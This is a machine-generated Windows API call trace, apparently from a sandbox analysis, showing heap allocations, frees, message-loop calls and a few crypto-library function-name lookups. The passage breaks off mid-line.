[0144.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0144.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0144.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0144.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0144.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0144.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0144.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0144.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0144.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0144.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0144.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0144.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0144.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0144.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0144.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0144.181] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0144.181] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0144.181] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0144.181] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0144.182] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0144.182] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0144.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0144.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0144.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0144.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0144.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0144.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0144.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0144.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0144.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0144.183] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0144.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0144.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0144.183] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0144.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0144.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0144.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0144.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0144.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0144.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0144.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0144.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0144.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0144.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0144.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0144.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0144.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0144.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0144.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0144.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0144.184] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0144.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.184] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0144.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0144.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0144.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0144.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0144.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0144.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0144.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0144.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0144.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0144.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0144.185] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0144.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0144.185] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0144.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0144.185] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0144.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0144.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0144.185] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0144.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0144.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0144.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0144.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0144.185] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0144.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0144.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0144.186] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0144.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0144.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0144.186] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0144.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0144.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0144.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0144.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0144.187] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0144.187] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0144.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0144.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0144.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0144.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0144.188] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0144.188] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0144.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0144.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0144.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0144.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0144.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0144.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0144.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0144.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0144.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0144.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0144.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0144.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0144.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0144.190] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0144.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0144.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0144.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0144.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0144.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0144.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0144.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0144.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0144.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0144.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0144.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0144.190] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0144.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0144.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0144.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0144.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0144.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0144.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0144.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0144.191] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, 